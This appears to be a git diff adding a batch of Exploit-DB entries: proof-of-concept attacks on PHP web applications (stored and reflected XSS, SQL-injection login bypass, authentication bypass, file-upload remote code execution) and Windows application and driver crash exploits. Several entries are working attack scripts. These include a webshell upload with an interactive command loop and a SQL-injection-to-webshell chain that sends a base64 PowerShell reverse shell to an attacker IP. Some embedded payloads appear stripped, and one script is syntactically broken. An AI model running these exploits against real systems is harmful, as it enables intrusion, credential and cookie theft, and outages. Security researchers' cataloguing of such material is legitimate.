+ \ No newline at end of file diff --git a/exploits/php/webapps/49713.txt b/exploits/php/webapps/49713.txt new file mode 100644 index 000000000..cc03995d2 --- /dev/null +++ b/exploits/php/webapps/49713.txt @@ -0,0 +1,22 @@ +# Title: Regis Inventory And Monitoring System 1.0 - 'Item List' Persistent Cross-Site Scripting +# Exploit Author: George Tsimpidas +# Date: 2021-03-25 +# Vendor Homepage: www.sourcecodester.com +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/regis_inventory.zip +# Version : 1.0.0 +# Tested on: Kali Linux 2020.4 +# Category: Webapp + +# Description + +Regis Inventory And Monitoring System, suffers from a stored cross site scripting on Item's List Category + +#PoC + +1. Login as admin : http://localhost/regis_inventory/index.php +2. Visit : http://localhost/regis_inventory/item.php +3. Click add a New Item and input your payload on "Generic Name" textbox. + +Payload : + +4. After inputting the Item values and submitting the form, it will trigger an XSS pop-up \ No newline at end of file diff --git a/exploits/php/webapps/49783.py b/exploits/php/webapps/49783.py new file mode 100755 index 000000000..f9e859aaf --- /dev/null +++ b/exploits/php/webapps/49783.py @@ -0,0 +1,44 @@ +# Exploit Title: rconfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (2) +# Exploit Author: Vishwaraj Bhattrai +# Date: 18/04/2021 +# Vendor Homepage: https://www.rconfig.com/ +# Software Link: https://www.rconfig.com/ +# Vendor: rConfig +# Version: <= v3.9.6 +# Tested against Server Host: Linux+XAMPP + +import requests +import sys +s = requests.Session() + +host=sys.argv[1] #Enter the hostname +cmd=sys.argv[2] #Enter the command + +def exec_cmd(cmd,host): + print "[+]Executing command" + path="https://%s/images/vendor/x.php?cmd=%s"%(host,cmd) + response=requests.get(path) + print response.text + print "\n[+]You can access shell via below path" + print path + +def file_upload(cmd,host): + print "[+]Bypassing file upload" + burp0_url = "https://"+host+":443/lib/crud/vendors.crud.php" + burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------3835647072299295753759313500", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/vendors.php", "Upgrade-Insecure-Requests": "1"} + burp0_cookies = {"_ga": "GA1.2.71516207.1614715346", "PHPSESSID": ""} + burp0_data = "-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"vendorName\"\r\n\r\nCisco2\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"vendorLogo\"; filename=\"banana.php\"\r\nContent-Type: image/gif\r\n\r\n\n\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"add\"\r\n\r\nadd\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"editid\"\r\n\r\n\r\n-----------------------------3835647072299295753759313500--\r\n" + requests.post(burp0_url, headers=burp0_headers, cookies=s.cookies,data=burp0_data) + exec_cmd(cmd,host) + + +def login(host,cmd): + print "[+]Logging in" + burp0_url = "https://"+host+":443/lib/crud/userprocess.php" + burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/login.php", "Upgrade-Insecure-Requests": "1"} + + burp0_data = {"user": "admin", "pass": "admin", "sublogin": "1"} #Use valid set of credentials default is set to admin/admin + response=s.post(burp0_url, headers=burp0_headers, cookies=s.cookies, data=burp0_data) + file_upload(cmd,host) + +login(host,cmd) \ No newline at end of file diff --git a/exploits/php/webapps/50017.py b/exploits/php/webapps/50017.py new file mode 100755 index 000000000..7f823be44 --- /dev/null +++ b/exploits/php/webapps/50017.py @@ -0,0 +1,88 @@ +# Exploit Title: OpenEMR 5.0.1.3 - '/portal/account/register.php' Authentication Bypass +# Date 15.06.2021 +# Exploit Author: Ron Jost (Hacker5preme) +# Vendor Homepage: https://www.open-emr.org/ +# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip +# Version: All versions prior to 5.0.1.4 +# Tested on: Ubuntu 18.04 +# CVE: CVE-2018-15152 +# CWE: CWE-287 +# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15152-Exploit + +''' +Description: +An unauthenticated user is able to bypass the Patient Portal Login by simply navigating to +the registration page and modifying the requested url to access the desired page. Some +examples of pages in the portal directory that are accessible after browsing to the +registration page include: +- add_edit_event_user.php +- find_appt_popup_user.php +- get_allergies.php +- get_amendments.php +- get_lab_results.php +- get_medications.php +- get_patient_documents.php +- get_problems.php +- get_profile.php +- portal_payment.php +- messaging/messages.php +- messaging/secure_chat.php +- report/pat_ledger.php +- report/portal_custom_report.php +- report/portal_patient_report.php +Normally, access to these pages requires authentication as a patient. If a user were to visit +any of those pages unauthenticated, they would be redirected to the login page. +''' + + +''' +Import required modules: +''' +import requests +import argparse + + +''' +User-Input: +''' +my_parser = argparse.ArgumentParser(description='OpenEMR Authentication bypass') +my_parser.add_argument('-T', '--IP', type=str) +my_parser.add_argument('-P', '--PORT', type=str) +my_parser.add_argument('-U', '--Openemrpath', type=str) +my_parser.add_argument('-R', '--PathToGet', type=str) +args = my_parser.parse_args() +target_ip = args.IP +target_port = args.PORT +openemr_path = args.Openemrpath +pathtoread = args.PathToGet + + +''' +Check for vulnerability: +''' +# Check, if Registration portal is enabled. If it is not, this exploit can not work +session = requests.Session() +check_vuln_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/portal/account/register.php' +check_vuln = session.get(check_vuln_url).text +print('') +print('[*] Checking vulnerability: ') +print('') + +if "Enter email address to receive registration." in check_vuln: + print('[+] Host Vulnerable. Proceeding exploit') +else: + print('[-] Host is not Vulnerable: Registration for patients is not enabled') + +''' +Exploit: +''' +header = { + 'Referer': check_vuln_url +} +exploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + pathtoread +Exploit = session.get(exploit_url, headers=header) +print('') +print('[+] Results: ') +print('') +print(Exploit.text) +print('') \ No newline at end of file diff --git a/exploits/php/webapps/50265.py b/exploits/php/webapps/50265.py new file mode 100755 index 000000000..de3603f08 --- /dev/null +++ b/exploits/php/webapps/50265.py @@ -0,0 +1,75 @@ +# Exploit Title: Patient Appointment Scheduler System 1.0 - Persistent/Stored XSS +# Date: 03/09/2021 +# Exploit Author: a-rey +# Vendor Homepage: https://www.sourcecodester.com/php/14928/patient-appointment-scheduler-system-using-php-free-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14928 +# Version: v1.0 +# Tested on: Ubuntu 20.04.3 LTS (Focal Fossa) with XAMPP 8.0.10-0 +# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Patient_Appointment_Scheduler_System/v1.0/writeup.md + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +import os +import logging +import requests +import argparse + +BANNER = """ +╔═══════════════════════════════════════════════════════════════════╗ +║ Patient Appointment Scheduler System v1.0 - Persistent/Stored XSS ║ +╚═══════════════════════════════════════════════════════════════════╝ + by: \033[0m\033[1;31m █████╗ ██████╗ ███████╗██╗ ██╗\033[0m + \033[0m\033[1;32m██╔══██╗ ██╔══██╗██╔════╝██║ ██║\033[0m + \033[0m\033[1;33m███████║ ███ ██████╔╝█████╗ ██╗ ██═╝\033[0m + \033[0m\033[1;34m██╔══██║ ██╔══██╗██╔══╝ ██╔╝ \033[0m + \033[0m\033[1;35m██║ ██║ ██║ ██║███████╗ ██║ \033[0m + \033[0m\033[1;36m╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ \033[0m +""" + + +def exploit(url:str, file:str) -> None: + if not os.path.exists(file): + logging.error(f'{file} does not exist?') + return + logging.info(f'reading {file} for XSS content ...') + with open(file, 'r') as f: + xssPayload = f.read() + logging.info(f'sending XSS payload ({len(xssPayload)} bytes) to {url}/classes/SystemSettings.php ...') + r = requests.post(url + '/classes/SystemSettings.php', + data={'about_us' : xssPayload}, + params={'f' : 'update_settings'}, + verify=False + ) + if not r.ok: + logging.error('HTTP request failed') + return + logging.info('checking for XSS payload on main page ...') + r = requests.get(url) + if xssPayload not in r.text: + logging.error(f'XSS injection failed? received: {r.text}') + logging.warning('maybe about.html is not writable?') + return + logging.success('XSS payload found on target website') + return + + +if __name__ == '__main__': + # parse arguments + parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER) + parser.add_argument('-u', '--url', help='website URL', type=str, required=True) + parser.add_argument('-f', '--file', help='file with DOM content to inject', type=str, required=True) + parser.add_argument('--debug', help='enable debugging output', action='store_true', default=False) + args = parser.parse_args() + # define logger + logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO' if not args.debug else 'DEBUG') + logging.SUCCESS = logging.CRITICAL + 1 + logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m') + logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m') + logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m') + logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m') + logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args) + # print banner + print(BANNER) + # run exploit + exploit(args.url, args.file) \ No newline at end of file diff --git a/exploits/php/webapps/50288.py b/exploits/php/webapps/50288.py new file mode 100755 index 000000000..90a206f5c --- /dev/null +++ b/exploits/php/webapps/50288.py @@ -0,0 +1,77 @@ +# Exploit Title: Apartment Visitor Management System (AVMS) 1.0 - 'username' SQL Injection +# Date: 2021-08-13 +# Exploit Author: mari0x00 +# Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/ +# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395 +# Version: 1.0 +# Tested on: Windows 10 + XAMPP + +#!/usr/bin/python3 + +import requests, socket, threading +import base64, time, sys + +print(('''###########################################################''',"red")) +print(('''########### AVMS SQLi to RCE by mari0x00 ############''',"red")) +print(('''###########################################################''',"red")) +print("") + +URL = input("Provide URL for AVMS (e.g. 'http://localhost/avms/'): ") or 'http://localhost/avms/' +path = input("Provide path for shell upload (default 'C:\\xampp\\htdocs\\avms\\lol.php'): ") or 'C:\\xampp\\htdocs\\avms\\lol.php' +path = path.replace("\\", "\\\\") +rhost = input("Provide attacker IP: ") or "127.0.0.1" +rport = input("Provide attacker listening port: ") or "1337" + + +# sending webshell +payload = {"username": "admin' union select '' into outfile '" + path + "' -- 'a", "password": "test", "login": ''} +requests.post(URL, data=payload) + + +def shell(rhost, rport): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + try: + s.bind((rhost, int(rport))) + except socket.error as msg: + print("Bind failed. Error Code : " + str(msg[0]) + " Message " + msg[1]) + sys.exit() + + s.settimeout(5) + s.listen(5) + print('[+] Waiting for connection..') + + conn = False + command='' + + while conn == False: + try: + conn, addr = s.accept() + print("Got a connection from " + addr[0] + ":" + str(addr[1])) + conn.send('\n'.encode()) + time.sleep(1) + print(conn.recv(0x10000).decode()) + while(command != 'exit'): + command=input('') + conn.send((command + '\n').encode()) + time.sleep(.3) + res = conn.recv(0x10000) + print(res.decode()) + s.close() + sys.exit("[!] Program exited") + except socket.timeout: + pass + + +def start_shell(rhost, rport): + revshell = "powershell -nop -NonI -W Hidden -Exec Bypass -c \"$client = New-Object System.Net.Sockets.TCPClient('" + rhost + "'," + rport + ");$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"" + revshell = revshell.encode('ascii') + revshell = base64.b64encode(revshell) + revshell = revshell.decode('ascii') + connection = requests.get(URL+"/lol.php?cmd=" + revshell) + +print("[+] Starting to listen on port " + rport) +time.sleep(0.5) +threading.Thread(target=shell, args=(rhost, rport)).start() +time.sleep(2) +print("[+] Sending the reverse shell payload") +threading.Thread(target=start_shell, args=(rhost, rport)).start() \ No newline at end of file diff --git a/exploits/php/webapps/50307.txt b/exploits/php/webapps/50307.txt new file mode 100644 index 000000000..8aedae48d --- /dev/null +++ b/exploits/php/webapps/50307.txt @@ -0,0 +1,19 @@ +# Exploit Title: Budget and Expense Tracker System 1.0 - Authenticated Bypass +# Exploit Author: Prunier Charles-Yves +# Date: September 20, 2021 +# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip +# Tested on: Linux, windows +# Vendor: oretnom23 +# Version: v1.0 + +# Exploit Description: +Budget and Expense Tracker System 1.0, is prone to an Easy authentication bypass vulnerability on the application +allowing the attacker to login with admin acount + + +----- PoC: Authentication Bypass ----- + +Administration Panel: http://localhost/expense_budget/admin/login.php + +Username: admin' or ''=' -- \ No newline at end of file diff --git a/exploits/php/webapps/50308.txt b/exploits/php/webapps/50308.txt new file mode 100644 index 000000000..7b235bf01 --- /dev/null +++ b/exploits/php/webapps/50308.txt @@ -0,0 +1,129 @@ +# Exploit Title: Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated) +# Exploit Author: Abdullah Khawaja (hax.3xploit) +# Date: 2021-09-21 +# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip +# Version: 2.0 +# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4 +# Description: Budget and Expense Tracker System 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters. + + + +# RCE via executing exploit: + # Step 1: run the exploit in python with this command: python3 BMAETS_v1.0.py + # Step 2: Input the URL of the vulnerable application: Example: http://localhost/expense_budget/ + + +import requests, sys, urllib, re +import datetime +from colorama import Fore, Back, Style + +requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) + + + + + +header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL + +print(Style.BRIGHT+" Budget and Expense Tracker System 1.0") +print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL) +print(header) + +print(r""" + ______ _______ ________ + ___ //_/__ /_______ ___ _______ ______(_)_____ _ + __ ,< __ __ \ __ `/_ | /| / / __ `/____ /_ __ `/ + _ /| | _ / / / /_/ /__ |/ |/ // /_/ /____ / / /_/ / + /_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___ / \__,_/ + /___/ + abdullahkhawaja.com + """) + + + +GREEN = '\033[32m' # Green Text +RED = '\033[31m' # Red Text +RESET = '\033[m' # reset to the defaults + +proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'} + + +#Create a new session +s = requests.Session() + + +#Set Cookie +cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'} + +LINK=input("Enter URL of The Vulnarable Application : ") + + +def webshell(LINK, session): + try: + WEB_SHELL = LINK+'/uploads/'+filename + getdir = {'cmd': 'echo %CD%'} + r2 = session.get(WEB_SHELL, params=getdir, verify=False, proxies=proxies) + status = r2.status_code + if status != 200: + print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL) + r2.raise_for_status() + print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.') + cwd = re.findall('[CDEF].*', r2.text) + cwd = cwd[0]+"> " + term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET + while True: + thought = input(term) + command = {'cmd': thought} + r2 = requests.get(WEB_SHELL, params=command, verify=False) + status = r2.status_code + if status != 200: + r2.raise_for_status() + response2 = r2.text + print(response2) + except: + print("\r\nExiting.") + sys.exit(-1) + + +#Creating a PHP Web Shell + +phpshell = { + 'img': + ( + 'shell.php', + '', + 'application/octet-stream', + {'Content-Disposition': 'form-data'} + ) + } + +# Defining value for form data +data = {'name':'Budget and Expense Tracker System - PHP', 'short_name':'B&E Tracker'} + + +def id_generator(): + x = datetime.datetime.now() + date_string = x.strftime("%y-%m-%d %H:%M") + date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M") + timestamp = datetime.datetime.timestamp(date) + file = int(timestamp) + final_name = str(file)+'_shell.php' + return final_name + +filename = id_generator() +#Uploading Reverse Shell +print("[*]Uploading PHP Shell For RCE...") +upload = s.post(LINK+'classes/SystemSettings.php?f=update_settings', cookies=cookies, files=phpshell, data=data, proxies=proxies) + +shell_upload = True if("1" in upload.text) else False +u=shell_upload +if u: + print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET) +else: + print(RED+"[-]Failed To Upload The PHP Shell!", RESET) + + + +#Executing The Webshell +webshell(LINK, s) \ No newline at end of file diff --git a/exploits/php/webapps/50349.txt b/exploits/php/webapps/50349.txt new file mode 100644 index 000000000..5f517cd32 --- /dev/null +++ b/exploits/php/webapps/50349.txt @@ -0,0 +1,13 @@ +# Exploit Title: WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS) +# Date: 2/15/2021 +# Author: 0xB9 +# Software Link: https://downloads.wordpress.org/plugin/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons.1.3.1.zip +# Version: 1.3.1 +# Tested on: Windows 10 +# CVE: CVE-2021-24287 + +1. Description: +The tab parameter in the Admin Panel is vulnerable to XSS. + +2. Proof of Concept: +wp-admin/options-general.php?page=moove-taxonomy-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/); \ No newline at end of file diff --git a/exploits/php/webapps/50362.txt b/exploits/php/webapps/50362.txt new file mode 100644 index 000000000..ec0900d30 --- /dev/null +++ b/exploits/php/webapps/50362.txt @@ -0,0 +1,40 @@ +# Exploit Title: Blood Bank System 1.0 - Authentication Bypass +# Date: 30-9-2021 +# Exploit Author: Nitin Sharma (vidvansh) +# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code/ +# Software Link : https://download.code-projects.org/details/f44a4ba9-bc33-48c3-b030-02f62117d230 +# Version: 1.0 +# Tested on: Windows 10 , Apache , Mysql + +# Description : Password input is affected with authentication bypass because of improper sanitisation which lead to access to auauthorised accounts. + +#Steps-To-Reproduce: +Step 1 Go to the Product admin panel http://localhost/bloodbank/login.php. +Step 2 – Enter anything in username and password +Step 3 – Click on Login and capture the request in the burp suite +Step4 – Change the username to ' OR 1 -- - and password to ' OR 1 -- -. +Step 5 – Click forward and now you will be logged in as admin. + +# PoC: + +GET /bloodbank/file/../bloodrequest.php?msg=Gandhi%20hospital%20have%20logged%20in. HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +Origin: http://localhost +Connection: close +Referer: http://localhost/bloodbank/login.php +Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76 +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 + +# Authentication Bypass: + +# Go to admin login page (http://localhost/bloodbank/login.php), then use below payload as username and password => +Username: ** Random email** +Password: ' or 1 -- - \ No newline at end of file diff --git a/exploits/php/webapps/50372.txt b/exploits/php/webapps/50372.txt new file mode 100644 index 000000000..e76467090 --- /dev/null +++ b/exploits/php/webapps/50372.txt @@ -0,0 +1,45 @@ +# Exploit Title: Lodging Reservation Management System 1.0 - Authentication Bypass +# Date: 2021-09-20 +# Exploit Author: Nitin Sharma(vidvansh) +# Vendor Homepage: https://www.sourcecodester.com/php/14883/lodging-reservation-management-system-php-free-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14883&title=Lodging+Reservation+Management+System+in+PHP+FREE+Source+Code +# Version: v1.0 +# Tested on: Windows 10 - XAMPP Server + + +# Description : Password input is affected with authentication bypass because of improper sanitisation which lead to access to auauthorised accounts. + +#Steps-To-Reproduce: +Step 1 Go to the Product admin panel http://localhost/lodge/admin/login.php. +Step 2 – Enter anything in username and password +Step 3 – Click on Login and capture the request in the burp suite +Step4 – Change the username to ' OR 1 -- - and password to ' OR 1 -- -. +Step 5 – Click forward and now you will be logged in as admin. + +# PoC: + +POST /lodge/classes/Login.php?f=login HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 +Accept: */* +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 49 +Origin: http://localhost +Connection: close +Referer: http://localhost/lodge/admin/login.php +Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76 +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin + +username=+'+or+1%3D1+--+&password=+'+or+1%3D1+--+ + + +# Authentication Bypass: + +# Go to admin login page (http://localhost/lodge/admin/login.php), then use below payload as username and password => +Username: ' or 1 -- - +Password: ' or 1 -- - \ No newline at end of file diff --git a/exploits/php/webapps/50460.txt b/exploits/php/webapps/50460.txt new file mode 100644 index 000000000..e6dd9d353 --- /dev/null +++ b/exploits/php/webapps/50460.txt @@ -0,0 +1,21 @@ +# Exploit Title: WordPress Plugin Supsystic Contact Form 1.7.18 - 'label' Stored Cross-Site Scripting (XSS) +# Date: 10/27/2021 +# Exploit Author: Murat DEMIRCI (@butterflyhunt3r) +# Vendor Homepage: https://supsystic.com/ +# Software Link: https://wordpress.org/plugins/contact-form-by-supsystic/ +# Version: 1.7.18 +# Tested on : Windows 10 + +#Poc: + +1. Install Latest WordPress + +2. Install and activate plugin. + +3. Open plugin, click "Add New Form" and select any form. + +4. Click "Fields" tab and "Add New Field". Choose whatever you want. + +5. Inject JavaScript payload which is mentioned below into 'label' field, save and alert will appear on the screen. + +Payload : \ No newline at end of file diff --git a/exploits/php/webapps/50461.html b/exploits/php/webapps/50461.html new file mode 100644 index 000000000..179e2ecc2 --- /dev/null +++ b/exploits/php/webapps/50461.html @@ -0,0 +1,47 @@ +# Exploit Title: PHPGurukul Hostel Management System 2.1 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS) +# Date: 2021-10-27 +# Exploit Author: Anubhav Singh +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/hostel-management-system/ +# Version: V 2.1 +# Vulnerable endpoint: http://localhost/hostel/hostel/my-profile.php +# Tested on Windows 10, XAMPP + +Steps to reproduce: + +1) Navigate to http://localhost/hostel/hostel/my-profile.php +2) Enter xss payload "> in name field +3) Click on Update Profile and intercept the request in Burpsuite +4) Generate a CSRF POC of Update Profile + +``` + + + +
+ + </script>" /> + + + + + + + + + + + +``` + +5) Send this POC to victim +6) When victim open the POC, his/her name will be updated to our XSS payload & payload will get fires. +7) Now attacker get's the details of victim like ip address, cookies of Victim, etc +8) So attacker is able to steal Victim's cookies successfully!! Account takeover!!! + +#POC + +https://ibb.co/jVcZxnt +https://ibb.co/DwGh4x9 \ No newline at end of file diff --git a/exploits/windows/dos/49337.py b/exploits/windows/dos/49337.py new file mode 100755 index 000000000..f14395c6d --- /dev/null +++ b/exploits/windows/dos/49337.py @@ -0,0 +1,25 @@ +# Exploit Title: Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC) +# Date: 22.12.2020 +# Software Link: http://www.tucows.com/download/windows/files/ezcdsetup.exe +# Exploit Author: Achilles +# Tested Version: 4.13 +# Tested on: Windows 7 x64 Sp1 + +# 1.- Run python code :Creator.py +# 2.- Open EVIL.txt and copy content to clipboard +# 3.- Open Easy CD & DVD Cover Creator.exe +# 4.- Press Unlock Now +# 4.- Paste the content of EVIL.txt into the Field: 'Serial Number' +# 5.- Press 'Continue'and you will see a crash. + +#!/usr/bin/env python +buffer = "\x41" * 6000 + +try: +open("Evil.txt","w") +print "[+] Creating %s bytes evil payload.." %len(buffer) +f.write(buffer) +f.close() +print "[+] File created!" +except: +print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/dos/49964.py b/exploits/windows/dos/49964.py new file mode 100755 index 000000000..81d53fcc7 --- /dev/null +++ b/exploits/windows/dos/49964.py @@ -0,0 +1,20 @@ +# Exploit Title: NBMonitor 1.6.8 - Denial of Service (PoC) +# Date: 07/06/2021 +# Author: Erick Galindo +# Vendor Homepage: http://www.nsauditor.com +# Software Link: http://www.nbmonitor.com/downloads/nbmonitor_setup.exe +# Version: 1.6.8 +# Tested on: Windows 10 Pro x64 es + +# Proof of Concept: +#1.- Copy printed "AAAAA..." string to clipboard! +#2.- Go to Register > Enter Registration Code... +#3.- Write anything in 'Name' field +#4.- Paste clipboard in 'Key' field +#5.- Click on button -> Ok + +buffer = "\x41" * 256 + +f = open ("NBM.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/49965.py b/exploits/windows/dos/49965.py new file mode 100755 index 000000000..e64c698ad --- /dev/null +++ b/exploits/windows/dos/49965.py @@ -0,0 +1,21 @@ +# Exploit Title: Nsauditor 3.2.3 - Denial of Service (PoC) +# Date: 07/06/2021 +# Author: Erick Galindo +# Vendor Homepage: http://www.nsauditor.com +# Software http://www.nsauditor.com/downloads/nsauditor_setup.exe +# Version: 3.2.3.0 +# Tested on: Windows 10 Pro x64 es + +# Proof of Concept: +#1.- Copy printed "AAAAA..." string to clipboard! +#2.- Open Nsauditor.exe +#3.- Go to Register > Enter Registration Code... +#4.- Write anything in 'Name' field +#5.- Paste clipboard in 'Key' field +#6.- Click on button -> Ok + +buffer = "\x41" * 256 + +f = open ("NBM.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/50266.py b/exploits/windows/dos/50266.py new file mode 100755 index 000000000..8327b66c3 --- /dev/null +++ b/exploits/windows/dos/50266.py @@ -0,0 +1,38 @@ +# Exploit Title: SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service +# Date: 9/5/2021 +# Exploit Author: Eric Salario +# Vendor Homepage: https://www.smartftp.com/en-us/ +# Software Link: https://www.smartftp.com/en-us/download +# Version: 10.0.2909.0 (32 and 64 bit) +# Tested on: Microsoft Windows 10 32 bit and 64 bit + +========================================================================= + +buffer = "//" +buffer += "A" * 423 + +f = open ("path.txt", "w") +f.write(buffer) +f.close() + +1. Run the python script +2. Open SmartFTP > New Connection > FTPS (explicit) +3. Enter a non existing ip the FTP server can't reach (e.g 255.255.255.255) +4. In Path, copy paste the content of the "path.txt" generated by the python script +5. Click "OK" +6. SmartFTP client crashes + +======================================================================= +1. Open SmartFTP > New Connection > FTPS (explicit) +2. Enter a non existing ip the FTP server can't reach (e.g 255.255.255.255) +3. In Path, type slash ("/") and click "OK" +4. The app should return "Error 0x80072741" +5. In the path's search bar, replace slash ("/") with whatever and press enter +6. SmartFTP client crashes + +======================================================================= + +1. Open SmartFTP +2. In the "New Connection" bar, clear the history (dropdown to the right of the bar) +3. Once the history is empty, click the bar and type anything +3. SmartFTP client crashes \ No newline at end of file diff --git a/exploits/windows/dos/50311.py b/exploits/windows/dos/50311.py new file mode 100755 index 000000000..b670f0fd6 --- /dev/null +++ b/exploits/windows/dos/50311.py @@ -0,0 +1,300 @@ +# Exploit Title: Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC) +# Date: 2021/04/07 +# Exploit Author: Quadron Research Lab +# Version: all version +# Tested on: Windows 10 x64 HUN/ENG Professional +# Vendor: https://www.yenkee.eu/gaming-mouse-hornet-aim/yms-3029 +# Reference: https://github.com/Quadron-Research-Lab/Kernel_Driver_bugs/tree/main/GM312Fltr + +import ctypes, sys +from ctypes import * +import io +from itertools import product +from sys import argv + +devicename = "GM312Fltr" + +ioctl = 0x22245C + +ioctl_list = ''' +0x22245C +0x222440 +0x222441 +0x222400 +0x222404 +0x222408 +0x222420 +0x222424 +0x222448 +0x222450 +0x22245c +0x222460 +''' + +kernel32 = windll.kernel32 +hevDevice = kernel32.CreateFileA("\\\\.\\GM312Fltr", 0xC0000000, 0, None, 0x3, 0, None) + +if not hevDevice or hevDevice == -1: + print ("Not Win! Sorry!") + +else: + print ("OPENED!") + + buf = 'A' * 2000 + bufLength = 2000 + + kernel32.DeviceIoControl(hevDevice, ioctl, buf, bufLength, None, 0, byref(c_ulong()), None) + +[Bugcheck Analysis] +Fatal System Error 0x000000f7 + (0xBEBEA1CAEAF0A2C1,0x0000F80736BC1742,0xFFFF07F8C943E8BD,0x0000000000000000) + +Break instruction exception - code 80000003 (first 